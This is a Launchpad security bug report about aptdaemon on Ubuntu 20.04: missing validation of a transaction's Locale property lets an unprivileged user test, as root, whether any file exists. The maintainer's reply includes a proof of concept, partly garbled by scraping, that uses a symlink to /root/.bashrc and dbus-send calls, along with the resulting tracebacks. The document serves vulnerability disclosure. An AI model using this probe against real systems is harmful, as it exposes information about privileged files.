Improper Input Validation vulnerability in Locale property of a transaction leading to Information Disclosure
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
aptdaemon (Ubuntu) |
Fix Released
|
Undecided
|
Unassigned |
Bug Description
Hi,
There is no input validation on the Locale property in an apt transaction. An unprivileged user can supply a full path to a writable directory, which lets aptd read a file as root. Having a symlink in place results in an error message if the file exists, and no error otherwise. This way an unprivileged user can check for the existence of any files on the system as root.
This is a similar type of bug as CVE-2015-1323.
See the attached Python script for details.
$ ./test_
File Exists!
$ ./test_
File does not exist!
Description: Ubuntu 20.04 LTS
Release: 20.04
aptdaemon:
Installed: 1.1.1+bzr982-
Candidate: 1.1.1+bzr982-
Version table:
*** 1.1.1+bzr982-
500 http://
500 http://
100 /var/lib/
1.
500 http://
500 http://
Kind regards,
Vaisha Bernard
EYE Control B.V.
CVE References
Changed in aptdaemon (Ubuntu): | |
status: | New → Triaged |
information type: | Private Security → Public Security |
Changed in aptdaemon (Ubuntu): | |
assignee: | Ravikant (ravikantcool) → nobody |
Yes I can confirm this is an issue and is quite similar to CVE-2015-1323 - like in https:/ /bugs.launchpad .net/ubuntu/ +source/ aptdaemon/ +bug/1449587 a simple bash example via dbus-send is enough to demonstrate this:
$ mkdir -p /tmp/a/LC_MESSAGES LC_MESSAGES/ aptdaemon. mo org.debian. apt \ apt.InstallFile \ /var/cache/ apt/archives/ dbus_1. 12.14-1ubuntu2. 1_amd64. deb \ .945425 sender=:1.194 -> destination=:1.193 serial=7 reply_serial=2 apt/transaction /51f737bf25f14d b7be88bdc5139ea 156" org.debian. apt /org/debian/ apt/transaction /51f737bf25f14d b7be88bdc5139ea 156 org.freedesktop .DBus.Propertie s.Set string: org.debian. apt.transaction string:Locale string:/tmp/a. .DBus.Python. OSError: Traceback (most recent call last): python3/ dist-packages/ defer/_ _init__ .py", line 487, in _inline_callbacks python3/ dist-packages/ aptdaemon/ policykit1. py", line 152, in get_uid_ from_dbus_ name value(uid) python3/ dist-packages/ defer/_ _init__ .py", line 462, in return_value DefGen_ Return: 1000
$ ln -s /root/.bashrc /tmp/a/
$ dbus-send --print-reply --system --dest=
/org/debian/apt org.debian.
string:
boolean:false
method return time=1595299798
string "/org/debian/
$ dbus-send --print-reply --system --dest=
Error org.freedesktop
File "/usr/lib/
result = gen.send(result)
File "/usr/lib/
return_
File "/usr/lib/
raise _DefGen_Return(val)
defer._
During handling of the above exception, another exception occurred:
Traceback (most recent call last): python3/ dist-packages/ defer/_ _init__ .py", line 487, in _inline_callbacks
File "/usr/lib/
result = gen.send(result)
StopIteration
During handling of the above exception, another exception occurred:
Traceback (most recent call last): python3/ dist-packages/ defer/_ _init__ .py", line 487, in _inline_callbacks python3/ dist-packages/ aptdaemon/ core.py" , line 1226, in _set_property _set_locale( value) python3/ dist-packages/ aptdaemon/ core.py" , line 835, in _set_locale _translation = gettext. translation( "aptdaemon" , python3. 8/gettext. py", line 613, in translation setdefault( key, class_(fp)) python3. 8/gettext. py", line 261, in __init__ python3. 8/gettext. py", line 393, in _parse LC_MESSAGES/ aptdaemon. mo'
File "/usr/lib/
result = gen.send(result)
File "/usr/lib/
self.
File "/usr/lib/
self.
File "/usr/lib/
t = _translations.
File "/usr/lib/
self._parse(fp)
File "/usr/lib/
raise OSError(0, 'Bad magic number', filename)
OSError: [Errno 0] Bad magic number: '/tmp/a/
Can you confirm if this has been reported elsewhere and whether a CVE has already been assigned for this issue (via MITRE or some other CVE Naming Authority)?